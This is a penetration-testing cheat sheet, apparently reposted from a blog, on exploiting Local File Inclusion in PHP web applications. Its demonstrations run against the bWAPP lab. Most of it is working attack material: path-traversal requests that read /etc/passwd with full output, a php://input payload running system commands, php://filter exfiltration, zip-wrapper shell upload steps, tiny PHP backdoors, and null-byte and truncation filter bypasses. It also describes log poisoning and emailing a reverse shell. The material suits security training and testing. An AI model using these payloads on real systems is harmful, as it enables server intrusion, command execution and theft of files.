• Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques


    Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques

    Jan 04, 2017, Version 1.0

    Contents

    What is a Local File Inclusion (LFI) vulnerability? 
    Example of Vulnerable Code
    Identifying LFI Vulnerabilities within Web Applications
    PHP Wrappers
    	PHP Expect Wrapper
    	PHP file:// Wrapper
    	PHP php://filter
    	PHP ZIP Wrapper LFI
    LFI via /proc/self/environ
    Useful Shells
    Null Byte Technique
    Truncation LFI Bypass
    Log File Contamination
    	Apache / Nginx
    Email a Reverse Shell
    References
    

    What is a Local File Inclusion (LFI) vulnerability?

    Local File Inclusion (LFI) allows an attacker to include files on a server through the web browser.
    This vulnerability exists when a web application includes a file without correctly sanitising the
    input, allowing and attacker to manipulate the input and inject path traversal characters and
    include other files from the web server.

    Example of Vulnerable Code

    The following is an example of PHP code vulnerable to local file inclusion.

    $file = $_GET['file'];
    if(isset($file))
    {
    include("pages/$file");
    }
    else
    {
    include("index.php");
    }
    

    Identifying LFI Vulnerabilities within Web Applications

    LFI vulnerabilities are easy to identify and exploit. Any script that includes a file from a web
    server is a good candidate for further LFI testing, for example:

    /script.php?page=index.html
    

    A penetration tester would attempt to exploit this vulnerability by manipulating the file location
    parameter, such as:

    /script.php?page=../../../../../../../../etc/passwd
    

    The above is an effort to display the contents of the /etc/passwd file on a UNIX / Linux based
    system.

    Below is an example of a successful exploitation of an LFI vulnerability on a web application:

    /bWAPP/rlfi.php?language=../../../etc/passwd
    
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    dhcp:x:101:102::/nonexistent:/bin/false
    syslog:x:102:103::/home/syslog:/bin/false
    klog:x:103:104::/home/klog:/bin/false
    hplip:x:104:7:HPLIP system user,,,:/var/run/hplip:/bin/false
    avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
    gdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false
    pulse:x:107:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
    messagebus:x:108:119::/var/run/dbus:/bin/false
    avahi:x:109:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
    polkituser:x:110:122:PolicyKit,,,:/var/run/PolicyKit:/bin/false
    haldaemon:x:111:123:Hardware abstraction layer,,,:/var/run/hald:/bin/false
    bee:x:1000:1000:bee,,,:/home/bee:/bin/bash
    mysql:x:112:124:MySQL Server,,,:/var/lib/mysql:/bin/false
    sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin
    dovecot:x:114:126:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
    smmta:x:115:127:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
    smmsp:x:116:128:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
    neo:x:1001:1001::/home/neo:/bin/sh
    alice:x:1002:1002::/home/alice:/bin/sh
    thor:x:1003:1003::/home/thor:/bin/sh
    wolverine:x:1004:1004::/home/wolverine:/bin/sh
    johnny:x:1005:1005::/home/johnny:/bin/sh
    selene:x:1006:1006::/home/selene:/bin/sh
    postfix:x:117:129::/var/spool/postfix:/bin/false
    proftpd:x:118:65534::/var/run/proftpd:/bin/false
    ftp:x:119:65534::/home/ftp:/bin/false
    snmp:x:120:65534::/var/lib/snmp:/bin/false
    ntp:x:121:131::/home/ntp:/bin/false
    

    PHP Wrappers

    PHP has a number of wrappers that can often be abused to bypass various input filters.

    PHP Expect Wrapper

    PHP expect:// allows execution of system commands, unfortunately the expect PHP module is
    not enabled by default.
    Example:

    php?page=expect://ls
    

    PHP file:// Wrapper

    The payload is sent in a POST request to the server such as:

    /fi/?page=php://input&cmd=ls
    

    Example using php://input against bWAPP:

    Request:

    POST

    /bWAPP/rlfi.php?language=php://input&cmd=id
    
    <?php echo system($_GET['cmd']);
    

    Response:

    uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data) 
    

    PHP php://filter

    php://filter allows a pen tester to include local files and base64 encodes the output. Therefore,
    any base64 output will need to be decoded to reveal the contents.

    An example using bWAPP:

    Request:

    /bWAPP/rlfi.php?language=php://filter/convert.base64-encode/resource=/etc/passwd
    

    Response:

    cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L2Jpbi9zaAptYW46eDo2OjEyOm1hbjovdmFyL2NhY2hlL21hbjovYmluL3NoCmxwOng6Nzo3OmxwOi92YXIvc3Bvb2wvbHBkOi9iaW4vc2gKbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovYmluL3NoCm5ld3M6eDo5Ojk6bmV3czovdmFyL3Nwb29sL25ld3M6L2Jpbi9zaAp1dWNwOng6MTA6MTA6dXVjcDovdmFyL3Nwb29sL3V1Y3A6L2Jpbi9zaApwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L2Jpbi9zaAp3d3ctZGF0YTp4OjMzOjMzOnd3dy1kYXRhOi92YXIvd3d3Oi9iaW4vc2gKYmFja3VwOng6MzQ6MzQ6YmFja3VwOi92YXIvYmFja3VwczovYmluL3NoCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L2Jpbi9zaAppcmM6eDozOTozOTppcmNkOi92YXIvcnVuL2lyY2Q6L2Jpbi9zaApnbmF0czp4OjQxOjQxOkduYXRzIEJ1Zy1SZXBvcnRpbmcgU3lzdGVtIChhZG1pbik6L3Zhci9saWIvZ25hdHM6L2Jpbi9zaApub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi9iaW4vc2gKbGlidXVpZDp4OjEwMDoxMDE6Oi92YXIvbGliL2xpYnV1aWQ6L2Jpbi9zaApkaGNwOng6MTAxOjEwMjo6L25vbmV4aXN0ZW50Oi9iaW4vZmFsc2UKc3lzbG9nOng6MTAyOjEwMzo6L2hvbWUvc3lzbG9nOi9iaW4vZmFsc2UKa2xvZzp4OjEwMzoxMDQ6Oi9ob21lL2tsb2c6L2Jpbi9mYWxzZQpocGxpcDp4OjEwNDo3OkhQTElQIHN5c3RlbSB1c2VyLCwsOi92YXIvcnVuL2hwbGlwOi9iaW4vZmFsc2UKYXZhaGktYXV0b2lwZDp4OjEwNToxMTM6QXZhaGkgYXV0b2lwIGRhZW1vbiwsLDovdmFyL2xpYi9hdmFoaS1hdXRvaXBkOi9iaW4vZmFsc2UKZ2RtOng6MTA2OjExNDpHbm9tZSBEaXNwbGF5IE1hbmFnZXI6L3Zhci9saWIvZ2RtOi9iaW4vZmFsc2UKcHVsc2U6eDoxMDc6MTE2OlB1bHNlQXVkaW8gZGFlbW9uLCwsOi92YXIvcnVuL3B1bHNlOi9iaW4vZmFsc2UKbWVzc2FnZWJ1czp4OjEwODoxMTk6Oi92YXIvcnVuL2RidXM6L2Jpbi9mYWxzZQphdmFoaTp4OjEwOToxMjA6QXZhaGkgbUROUyBkYWVtb24sLCw6L3Zhci9ydW4vYXZhaGktZGFlbW9uOi9iaW4vZmFsc2UKcG9sa2l0dXNlcjp4OjExMDoxMjI6UG9saWN5S2l0LCwsOi92YXIvcnVuL1BvbGljeUtpdDovYmluL2ZhbHNlCmhhbGRhZW1vbjp4OjExMToxMjM6SGFyZHdhcmUgYWJzdHJhY3Rpb24gbGF5ZXIsLCw6L3Zhci9ydW4vaGFsZDovYmluL2ZhbHNlCmJlZTp4OjEwMDA6MTAwMDpiZWUsLCw6L2hvbWUvYmVlOi9iaW4vYmFzaApteXNxbDp4OjExMjoxMjQ6TXlTUUwgU2VydmVyLCwsOi92YXIvbGliL215c3FsOi9iaW4vZmFsc2UKc3NoZDp4OjExMzo2NTUzNDo6L3Zhci9ydW4vc3NoZDovdXNyL3NiaW4vbm9sb2dpbgpkb3ZlY290Ong6MTE0OjEyNjpEb3ZlY290IG1haWwgc2VydmVyLCwsOi91c3IvbGliL2RvdmVjb3Q6L2Jpbi9mYWxzZQpzbW10YTp4OjExNToxMjc6TWFpbCBUcmFuc2ZlciBBZ2VudCwsLDovdmFyL2xpYi9zZW5kbWFpbDovYmluL2ZhbHNlCnNtbXNwOng6MTE2OjEyODpNYWlsIFN1Ym1pc3Npb24gUHJvZ3JhbSwsLDovdmFyL2xpYi9zZW5kbWFpbDovYmluL2ZhbHNlCm5lbzp4OjEwMDE6MTAwMTo6L2hvbWUvbmVvOi9iaW4vc2gKYWxpY2U6eDoxMDAyOjEwMDI6Oi9ob21lL2FsaWNlOi9iaW4vc2gKdGhvcjp4OjEwMDM6MTAwMzo6L2hvbWUvdGhvcjovYmluL3NoCndvbHZlcmluZTp4OjEwMDQ6MTAwNDo6L2hvbWUvd29sdmVyaW5lOi9iaW4vc2gKam9obm55Ong6MTAwNToxMDA1OjovaG9tZS9qb2hubnk6L2Jpbi9zaApzZWxlbmU6eDoxMDA2OjEwMDY6Oi9ob21lL3NlbGVuZTovYmluL3NoCnBvc3RmaXg6eDoxMTc6MTI5OjovdmFyL3Nwb29sL3Bvc3RmaXg6L2Jpbi9mYWxzZQpwcm9mdHBkOng6MTE4OjY1NTM0OjovdmFyL3J1bi9wcm9mdHBkOi9iaW4vZmFsc2UKZnRwOng6MTE5OjY1NTM0OjovaG9tZS9mdHA6L2Jpbi9mYWxzZQpzbm1wOng6MTIwOjY1NTM0OjovdmFyL2xpYi9zbm1wOi9iaW4vZmFsc2UKbnRwOng6MTIxOjEzMTo6L2hvbWUvbnRwOi9iaW4vZmFsc2UK
    

    Base64 decoding the string provides the /etc/passwd file:

    bee@bee-box:~$ echo 'cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L2Jpbi9zaAptYW46eDo2OjEyOm1hbjovdmFyL2NhY2hlL21hbjovYmluL3NoCmxwOng6Nzo3OmxwOi92YXIvc3Bvb2wvbHBkOi9iaW4vc2gKbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovYmluL3NoCm5ld3M6eDo5Ojk6bmV3czovdmFyL3Nwb29sL25ld3M6L2Jpbi9zaAp1dWNwOng6MTA6MTA6dXVjcDovdmFyL3Nwb29sL3V1Y3A6L2Jpbi9zaApwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L2Jpbi9zaAp3d3ctZGF0YTp4OjMzOjMzOnd3dy1kYXRhOi92YXIvd3d3Oi9iaW4vc2gKYmFja3VwOng6MzQ6MzQ6YmFja3VwOi92YXIvYmFja3VwczovYmluL3NoCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L2Jpbi9zaAppcmM6eDozOTozOTppcmNkOi92YXIvcnVuL2lyY2Q6L2Jpbi9zaApnbmF0czp4OjQxOjQxOkduYXRzIEJ1Zy1SZXBvcnRpbmcgU3lzdGVtIChhZG1pbik6L3Zhci9saWIvZ25hdHM6L2Jpbi9zaApub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi9iaW4vc2gKbGlidXVpZDp4OjEwMDoxMDE6Oi92YXIvbGliL2xpYnV1aWQ6L2Jpbi9zaApkaGNwOng6MTAxOjEwMjo6L25vbmV4aXN0ZW50Oi9iaW4vZmFsc2UKc3lzbG9nOng6MTAyOjEwMzo6L2hvbWUvc3lzbG9nOi9iaW4vZmFsc2UKa2xvZzp4OjEwMzoxMDQ6Oi9ob21lL2tsb2c6L2Jpbi9mYWxzZQpocGxpcDp4OjEwNDo3OkhQTElQIHN5c3RlbSB1c2VyLCwsOi92YXIvcnVuL2hwbGlwOi9iaW4vZmFsc2UKYXZhaGktYXV0b2lwZDp4OjEwNToxMTM6QXZhaGkgYXV0b2lwIGRhZW1vbiwsLDovdmFyL2xpYi9hdmFoaS1hdXRvaXBkOi9iaW4vZmFsc2UKZ2RtOng6MTA2OjExNDpHbm9tZSBEaXNwbGF5IE1hbmFnZXI6L3Zhci9saWIvZ2RtOi9iaW4vZmFsc2UKcHVsc2U6eDoxMDc6MTE2OlB1bHNlQXVkaW8gZGFlbW9uLCwsOi92YXIvcnVuL3B1bHNlOi9iaW4vZmFsc2UKbWVzc2FnZWJ1czp4OjEwODoxMTk6Oi92YXIvcnVuL2RidXM6L2Jpbi9mYWxzZQphdmFoaTp4OjEwOToxMjA6QXZhaGkgbUROUyBkYWVtb24sLCw6L3Zhci9ydW4vYXZhaGktZGFlbW9uOi9iaW4vZmFsc2UKcG9sa2l0dXNlcjp4OjExMDoxMjI6UG9saWN5S2l0LCwsOi92YXIvcnVuL1BvbGljeUtpdDovYmluL2ZhbHNlCmhhbGRhZW1vbjp4OjExMToxMjM6SGFyZHdhcmUgYWJzdHJhY3Rpb24gbGF5ZXIsLCw6L3Zhci9ydW4vaGFsZDovYmluL2ZhbHNlCmJlZTp4OjEwMDA6MTAwMDpiZWUsLCw6L2hvbWUvYmVlOi9iaW4vYmFzaApteXNxbDp4OjExMjoxMjQ6TXlTUUwgU2VydmVyLCwsOi92YXIvbGliL215c3FsOi9iaW4vZmFsc2UKc3NoZDp4OjExMzo2NTUzNDo6L3Zhci9ydW4vc3NoZDovdXNyL3NiaW4vbm9sb2dpbgpkb3ZlY290Ong6MTE0OjEyNjpEb3ZlY290IG1haWwgc2VydmVyLCwsOi91c3IvbGliL2RvdmVjb3Q6L2Jpbi9mYWxzZQpzbW10YTp4OjExNToxMjc6TWFpbCBUcmFuc2ZlciBBZ2VudCwsLDovdmFyL2xpYi9zZW5kbWFpbDovYmluL2ZhbHNlCnNtbXNwOng6MTE2OjEyODpNYWlsIFN1Ym1pc3Npb24gUHJvZ3JhbSwsLDovdmFyL2xpYi9zZW5kbWFpbDovYmluL2ZhbHNlCm5lbzp4OjEwMDE6MTAwMTo6L2hvbWUvbmVvOi9iaW4vc2gKYWxpY2U6eDoxMDAyOjEwMDI6Oi9ob21lL2FsaWNlOi9iaW4vc2gKdGhvcjp4OjEwMDM6MTAwMzo6L2hvbWUvdGhvcjovYmluL3NoCndvbHZlcmluZTp4OjEwMDQ6MTAwNDo6L2hvbWUvd29sdmVyaW5lOi9iaW4vc2gKam9obm55Ong6MTAwNToxMDA1OjovaG9tZS9qb2hubnk6L2Jpbi9zaApzZWxlbmU6eDoxMDA2OjEwMDY6Oi9ob21lL3NlbGVuZTovYmluL3NoCnBvc3RmaXg6eDoxMTc6MTI5OjovdmFyL3Nwb29sL3Bvc3RmaXg6L2Jpbi9mYWxzZQpwcm9mdHBkOng6MTE4OjY1NTM0OjovdmFyL3J1bi9wcm9mdHBkOi9iaW4vZmFsc2UKZnRwOng6MTE5OjY1NTM0OjovaG9tZS9mdHA6L2Jpbi9mYWxzZQpzbm1wOng6MTIwOjY1NTM0OjovdmFyL2xpYi9zbm1wOi9iaW4vZmFsc2UKbnRwOng6MTIxOjEzMTo6L2hvbWUvbnRwOi9iaW4vZmFsc2UK' | base64 -d
    
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    dhcp:x:101:102::/nonexistent:/bin/false
    syslog:x:102:103::/home/syslog:/bin/false
    klog:x:103:104::/home/klog:/bin/false
    hplip:x:104:7:HPLIP system user,,,:/var/run/hplip:/bin/false
    avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
    gdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false
    pulse:x:107:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
    messagebus:x:108:119::/var/run/dbus:/bin/false
    avahi:x:109:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
    polkituser:x:110:122:PolicyKit,,,:/var/run/PolicyKit:/bin/false
    haldaemon:x:111:123:Hardware abstraction layer,,,:/var/run/hald:/bin/false
    bee:x:1000:1000:bee,,,:/home/bee:/bin/bash
    mysql:x:112:124:MySQL Server,,,:/var/lib/mysql:/bin/false
    sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin
    dovecot:x:114:126:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
    smmta:x:115:127:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
    smmsp:x:116:128:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
    neo:x:1001:1001::/home/neo:/bin/sh
    alice:x:1002:1002::/home/alice:/bin/sh
    thor:x:1003:1003::/home/thor:/bin/sh
    wolverine:x:1004:1004::/home/wolverine:/bin/sh
    johnny:x:1005:1005::/home/johnny:/bin/sh
    selene:x:1006:1006::/home/selene:/bin/sh
    postfix:x:117:129::/var/spool/postfix:/bin/false
    proftpd:x:118:65534::/var/run/proftpd:/bin/false
    ftp:x:119:65534::/home/ftp:/bin/false
    snmp:x:120:65534::/var/lib/snmp:/bin/false
    ntp:x:121:131::/home/ntp:/bin/false
    

    php://filter can also be used without base64 encoding the output using:

    ?page=php://filter/resource=/etc/passwd
    

    bWAPP:

    /bWAPP/rlfi.php?language=php://filter/resource=/etc/passwd
    
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    dhcp:x:101:102::/nonexistent:/bin/false
    syslog:x:102:103::/home/syslog:/bin/false
    klog:x:103:104::/home/klog:/bin/false
    hplip:x:104:7:HPLIP system user,,,:/var/run/hplip:/bin/false
    avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
    gdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false
    pulse:x:107:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
    messagebus:x:108:119::/var/run/dbus:/bin/false
    avahi:x:109:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
    polkituser:x:110:122:PolicyKit,,,:/var/run/PolicyKit:/bin/false
    haldaemon:x:111:123:Hardware abstraction layer,,,:/var/run/hald:/bin/false
    bee:x:1000:1000:bee,,,:/home/bee:/bin/bash
    mysql:x:112:124:MySQL Server,,,:/var/lib/mysql:/bin/false
    sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin
    dovecot:x:114:126:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
    smmta:x:115:127:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
    smmsp:x:116:128:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
    neo:x:1001:1001::/home/neo:/bin/sh
    alice:x:1002:1002::/home/alice:/bin/sh
    thor:x:1003:1003::/home/thor:/bin/sh
    wolverine:x:1004:1004::/home/wolverine:/bin/sh
    johnny:x:1005:1005::/home/johnny:/bin/sh
    selene:x:1006:1006::/home/selene:/bin/sh
    postfix:x:117:129::/var/spool/postfix:/bin/false
    proftpd:x:118:65534::/var/run/proftpd:/bin/false
    ftp:x:119:65534::/home/ftp:/bin/false
    snmp:x:120:65534::/var/lib/snmp:/bin/false
    ntp:x:121:131::/home/ntp:/bin/false
    

    PHP ZIP Wrapper LFI

    The zip wrapper processes uploaded .zip files server side allowing a penetration tester to upload
    a zip file using a vulnerable file upload function and leverage he zip filter via an LFI to execute. A
    typical attack example would look like:

    1. Create a PHP reverse shell
    2. Compress to a .zip file
    3. Upload the compressed shell payload to the server
    4. Use the zip wrapper to extract the payload using:
    	php?page=zip://path/to/file.zip%23shell
    5. The above will extract the zip file to shell, if the server does not append .php rename it to
    shell.php instead
    

    If the file upload function does not allow zip files to be uploaded, attempts can be made to bypass
    the file upload function (see: OWASP file upload testing document).

    bWAPP /bWAPP/rlfi.php:

    $language = $_GET["language"] . ".php";
    

    Useful:

    /bWAPP/rlfi.php?language=zip://./images/hehe.zip%23hehe
    /bWAPP/rlfi.php?language=zip:///var/www/bWAPP/images/hehe.zip%23hehe
    

    zip wrapper:

    hehe.zip-->hehe.php	<?php phpinfo();
    

    LFI via /proc/self/environ

    If it’s possible to include /proc/self/environ via a local file inclusion vulnerability, then introducing
    source code via the User Agent header is a possible vector. Once code has been injected into the
    User Agent header a local file inclusion vulnerability can be leveraged to execute
    /proc/self/environ and reload the environment variables, executing your reverse shell.

    Useful Shells

    Useful tiny PHP back doors for the above techniques:

    <? system('uname -a');?>
    

    Null Byte Technique

    Null byte injection bypasses application filtering within web applications by adding URL encoded
    “Null bytes” such as %00. Typically, this bypasses basic web application blacklist filters by adding
    additional null characters that are then allowed or not processed by the backend web application.

    Some practical examples of null byte injection for LFI:

    /bWAPP/rlfi.php?language=/etc/passwd%00
    /bWAPP/rlfi.php?language=/etc/passwd%2500
    

    Truncation LFI Bypass

    Truncation is another blacklist bypass technique. By injecting long parameter into the vulnerable
    file inclusion mechanism, the web application may “cut it off” (truncate) the input parameter,
    which may bypass the input filter.

    LFI truncation examples:

    /bWAPP/rlfi.php?language=/etc/passwd…………………………………………………………………………….
    /bWAPP/rlfi.php?language=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
    /bWAPP/rlfi.php?language=/etc/passwd/../../../../../../../../../../../../../../../../../..
    

    Log File Contamination

    Log file contamination is the process of injecting source code into log files on the target system.
    This is achieved by introducing source code via other exposed services on the target system
    which the target operating system / service will store in log files. For example, injecting PHP
    reverse shell code into a URL, causing syslog to create an entry in the apache access log for a
    404 page not found entry. The apache log file would then be parsed using a previously discovered
    file inclusion vulnerability, executing the injected PHP reverse shell.

    After introducing source code to the target systems log file(s) the next step is identifying the
    location of the log file. During the recon and discovery stage of penetration testing the web server
    and likely the target operating system would have been identified, a good starting point would be
    looking up the default log paths for the identified operating system and web server (if they are
    not already known by the consultant). FuzzDB’s Burp LFI payload lists can be used in conjunction
    with Burp intruder to quickly identify valid log file locations on the target system.

    Some commonly exposed services on a Linux / UNIX systems are listed below:

    Apache / Nginx

    Inject code into the web server access or error logs using netcat, after successful injection parse
    the server log file location by exploiting the previously discovered LFI vulnerability. If the web
    server access / error logs are long, it may take some time execute your injected code.

    Email a Reverse Shell

    If the target machine relays mail either directly or via another machine on the network and stores mail
    for the user www-data (or the apache user) on the system then it’s possible to email a reverse shell to the target. If no MX records exist for the domain but SMTP is exposed it’s possible to connect to the target mail server and send mail to the www-data / apache user. Mail is sent to the user running apache such as www-data to ensure file system permissions will allow read access the file /var/spool/mail/www-data containing the injected PHP reverse shell code.

    First enumerate the target system using a list of known UNIX / Linux account names:

    The following screenshot shows the process of sending email via telnet to the www-data user:

    Resulting in a reverse shell connecting back to a running netcat listener:

    References

    Information sources used within this document:
    	https://highon.coffee/blog/lfi-cheat-sheet/
    	https://www.owasp.org/index.php/PHP_File_Inclusion
    DVWA (used for LFI examples): 
    	http://www.dvwa.co.uk/
    

    via

    Copyright © 2021 Primzahl. All rights reserved.

  • 相关阅读:
    Two Sum 2015年6月8日
    Word Ladder II 2015年6月4日
    Word Ladder 2015年6月3日
    华为
    《安卓网络编程》之第八篇 安卓与服务器之间通讯JSON
    星辉信息科技Odoo开发教程10-odoo开发环境准备
    星辉信息科技Odoo开发教程9-odoo创建视图02
    星辉信息科技Odoo开发教程8-odoo创建视图01
    星辉信息科技Odoo开发教程7-创建菜单项
    星辉信息科技Odoo开发教程6-配置安全权限控制02
  • 原文地址:https://www.cnblogs.com/Primzahl/p/6258149.html
Copyright © 2020-2023  润新知